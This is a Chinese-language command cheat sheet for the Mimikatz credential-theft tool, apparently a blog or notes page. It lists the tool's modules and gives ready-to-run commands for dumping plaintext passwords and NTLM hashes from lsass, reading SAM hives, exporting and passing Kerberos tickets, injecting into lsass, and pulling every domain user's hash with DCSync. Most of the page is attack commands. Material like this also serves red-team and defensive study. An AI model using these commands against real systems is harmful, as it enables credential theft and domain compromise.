项目地址
https://github.com/gentilkiwi/mimikatz/
简介
Mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码
mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。
常用命令
system::user //查看当前登录的用户
process::list //列出进程
process::stop processname //结束进程(有些进程结束不了,即使权限够大)
process::suspend processname //暂停进程
process::modules //列出系统核心模块和其所在的物理路径
service::list //列出系统服务
service::stop(start) service_name //停止(开启)服务
privilege::list //列出系统权限列表
privilege::debug //提升权限 (执行这条命令得有足够的权限)
nogpo::cmd //打开cmd
nogpo::regedit //打开注册表
ts::sessions //显示当前回话
ts::processes //显示当前进程及其PID
sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行)
lsadump::lsa /patch //获取当前此计算机存在过用户的NTLMHASH
inject::process lsass.exe '路径' sekurlsa.dll //进程注入(如果用1.0版本获取hash的时候发现sekurlsa模块常用模块
cls: 清屏
standard: 标准模块,基本命令
crypto: 加密相关模块
sekurlsa: 与证书相关的模块
kerberos: kerberos模块
privilege: 提权相关模块
process: 进程相关模块
serivce: 服务相关模块
lsadump: LsaDump模块
ts: 终端服务器模块
event: 事件模块
misc: 杂项模块
token: 令牌操作模块
vault: Windows 、证书模块
minesweeper:Mine Sweeper模块
net:
dpapi: DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
busylight: BusyLight Module
sysenv: 系统环境值模块
sid: 安全标识符模块
iis: IIS XML配置模块
rpc: mimikatz的RPC控制
sr98: 用于SR98设备和T5577目标的RF模块
rdm: RDM(830AL)器件的射频模块
acr: ACR模块
version: 查看版本
exit: 退出
模块
sekurlsa模块
sekurlsa::logonpasswords
抓取用户NTLM哈希
sekurlsa::msv
加载dmp文件,并导出其中的明文密码
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full
导出lsass.exe进程中所有的票据
sekurlsa::tickets /export
kerberos模块
列出系统中的票据
kerberos::list
kerberos::tgt
清除系统中的票据
kerberos::purge
导入票据到系统中
kerberos::ptc 票据路径
lsadump模块
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等
lsadump::dcsync /domain:kevin.com /user:root
(在域控上执行)读取所有域用户的哈希
lsadump::lsa /patch
从sam.hive和system.hive文件中获得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive
从本地SAM文件中读取密码哈希
token::elevate
lsadump::sam
读取域成员HASH
域控本地读取
- 直接执行
Copy#提升权限
privilege::debug
抓取密码
lsadump::lsa /patch- 通过 dcsync,利用目录复制服务(DRS)从NTDS.DIT文件中检索密码哈希值,可以在域管权限下执行获取
Copy#获取所有域用户
lsadump::dcsync /domain:test.com /all /csv
#指定获取某个用户的hash
lsadump::dcsync /domain:test.com /user:test参考文章:
https://blog.gentilkiwi.com/mimikatz
https://blog.51cto.com/u_15127617/4276127
https://blog.csdn.net/weixin_40412037/article/details/113348310
https://blog.csdn.net/weixin_45588247/article/details/119497964
